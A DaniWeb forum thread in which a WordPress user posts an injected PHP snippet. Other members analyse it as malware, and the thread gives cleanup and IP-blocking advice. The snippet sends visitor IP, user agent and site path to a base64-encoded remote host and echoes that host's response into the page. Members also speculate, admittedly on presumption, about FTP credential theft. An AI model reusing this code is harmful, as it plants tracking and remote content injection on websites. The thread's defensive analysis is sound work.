Member Avatar for begueradj

Hello,
I came across this script. I would love to understand what is its purpose (I tried it on localhost, I saw its behavior but I do not understand it):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Seek for the type of the browser that requested the page by checking the header of User_Agent
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Honestly, I think this script is a malware script. It was probably injected through the wordpress backdoor. I think the exact name of this malware is called FTP credential malware distributed or created by pubbotstatistic.com . You will just have to search on this to confirm my assumptions.

If this is truly a malware, this is how it operates. This malware will steal your FTP credentials provided on the wordpress script upgrade interface on the administration panel.

Once the wordpress connects to the remote site for upgrades, the malware script above will send your FTP credentials to xxxxxxxxxxxxxxxxxxx/statC/stat.php .

Make sure to confirm that this is indeed a malware
To get rid of this malware, make a backup copy of your mysql database only, and then contact your hosting provider and tell them that your FTP account has been compromised.

Once your hosting provider reset your cpanel and FTP account user and password, it is a lot safer for you to just delete your entire wordpress installation directory and rebuild from the back-up database.

Another alternative will be depending on your experience. Connect to your fTP server and open the directory where the wordpress is installed, find any newer files than the rest of the original wordpress files. Normallly, malware came later. If the malware will write anything on your wordpress directory, it will be a lot newer than the orignal files. Unless, you have been editing files lately and your safest is to just go for the complete deletion.

Once everything are clean, login to your cpanel and click on the IP blocking option and then block this IP address: 108.167.172.14 which is connected to

aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

and is equavalent to

 xxxxxxxxxxxxxxxxxx/statC/stat.php 

good luck to you..

Member Avatar for begueradj

Thank you very much for explaining me all this (indeed I am using wordpress).
However, I do not understand technically speaking why the script concatenates

    aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

With the address of my website ? And why the result of this concatenation is:

xxxxxxxxxxxxxxxxxxxxxx/statC/stat.php 

instead of

xxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php.MyOwnWebsite.com

If you want to prove my analysis about this script, try simulating this on your localhost.

change this

 aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

to this

aHR0cDovL2xvY2FsaG9zdC9zdGF0LnBocA==

which is nothing but redirecting their hack on your localhost/stat.php

On your localhost public directory create a file stat.php and paste the following codes

if(isset($_GET['ip'])){

    echo urldecode($_GET['ip']).'<br/>';
    echo urldecode($_GET['useragent']).'<br/>';
    echo urldecode($_GET['domainhame']).'<br/>';
    echo urldecode($_GET['fullpath']).'<br/>';
    echo urldecode($_GET['check']).'<br/>';

    }

You can also write them on a text file....

Member Avatar for begueradj

I did the changes you asked me and create stat.php file, but it does not display me anything (and no error)

why the result of concatenation is not xxxxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php.MyOwnWebsite.com but xxxxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php ?

tried

<?php

    echo base64_decode('  aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=');

and you are right that translate to xxxxxxxxxxxxxxxxxxxxx/statC/stat.php

but your information is being sent out like this /statC/stat.php?ip=''&useragent=''&domainname=yourWebsite.com&fullpath=''&check=''

You will need to research about this though. What I am telling you above are all based on presumption. It can be true, but there are always other facts outside the scope of my understanding.

Member Avatar for begueradj

Yes, you are right, I am supposed to be able to get the IP parameter as you suggesed on your script stat.php, but nothing is received: after all, I think it is logical as my localhost addres is replaced by the name of that website only.
But there is something mysterious I do not understand yet about it.
I checked PHP documentation and I read about all those functions used in the malware, but I did not get an answer.

Thank you very much for highlighting me those points.
Regards

Member Avatar for diafol

Heh heh, seems like the site xxxxxxxxxxxxxx has a problem - XAMPP is showing - so you have access to their phpinfo(). Interesting.

Member Avatar for begueradj
"Heh heh, seems like the site xxxxxxxxxxxxxxxx has a problem - XAMPP is showing - so you have access to their phpinfo(). Interesting." 

What do you mean, please ?

Diafol... that is your own phpinfo().. I just checked the domain and it is a phishing url according to trendmicro..

I think we should remove the full url from this thread.

Member Avatar for diafol

I don't click thankfully. Thanks for the heads up. Good idea - I'll remove link now

Member Avatar for begueradj

Is it a phishing technique as an operation, Veedeoo ?

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.